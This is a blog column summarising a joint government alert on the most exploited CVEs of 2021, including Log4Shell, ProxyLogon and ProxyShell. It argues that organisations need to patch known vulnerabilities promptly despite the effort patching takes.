One of the most frustrating things about cybersecurity is that most of the vulnerabilities that are exploited by cybercriminals are well documented. A joint alert that was shared by the Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Federal Bureau of Investigation (FBI), Australian Cyber Security Centre (ACSC), Canadian Centre for Cyber Security (CCCS), New Zealand National Cyber Security Centre (NZ NCSC), and United Kingdom’s National Cyber Security Centre (NCSC-UK) even goes far as to identify the top 15 Common Vulnerabilities and Exposures (CVEs) routinely exploited in 2021. They include:
CVE-2021-44228. This vulnerability, known as Log4Shell, affects Apache’s Log4j library, an open-source logging framework. An actor can exploit this vulnerability by submitting a specially crafted request to a vulnerable system that causes that system to execute arbitrary code. The request allows a cyber actor to take full control over the system.
CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, CVE-2021-27065. These vulnerabilities, known as ProxyLogon, affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination known as vulnerability chaining, allows an unauthenticated user to execute arbitrary code to gain persistent access to files and mailboxes on the servers in addition to credentials stored on the servers.
CVE-2021-34523, CVE-2021-34473, CVE-2021-31207. These vulnerabilities, known as ProxyShell, also affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination enables a cybercriminal to also execute arbitrary code. These vulnerabilities reside within the Microsoft Client Access Service (CAS), which typically runs on port 443 in Microsoft Internet Information Services (IIS) platform.
CVE-2021-26084. This vulnerability affects Atlassian Confluence Server and Data Center platforms. It too allows an unauthenticated actor to execute arbitrary code.
The alert notes that three of the top 15 routinely vulnerabilities in 2021 were also routinely exploited in 2020. Obviously, a lot of organizations are still failing to patch software in a timely manner. A recent report published by BeyondTrust, a provider of a patch management platform, notes a third of breaches are the result of a known vulnerability that was not patched.
The challenge is that successful patch management requires a lot of time and effort. IT teams need to continuously track when patches are available, find a developer to install the patch, test it, document it was applied and then generate a report. It’s not uncommon for a patch to break one or more applications given all the dependencies that exist between all the software components that make up an IT environment. When a vulnerability is disclosed, it can take months to find all the instances. Many IT teams are still working toward patching all the instances of the open-source Log4j log management tool for Java applications four months after a zero-day Log4Shell vulnerability was discovered.
The only thing more tedious than patching applications, of course, is cleaning up after a breach has been detected. The only real difference is the level of scrutiny that inevitably accompanies a breach. They say an ounce of prevention is always worth a pound of cure. That’s never been truer than when it comes to IT environments where simple inertia all too often winds up being the worst enemy of all.
Mike Vizard has covered IT for more than 25 years and has edited or contributed to a number of tech publications including InfoWorld, eWeek, CRN, Baseline, ComputerWorld, TMCNet, and Digital Review. He currently blogs for IT Business Edge and contributes to CIOinsight, The Channel Insider, Programmableweb, and Slashdot. Mike also blogs about emerging cloud technology for SmarterMSP.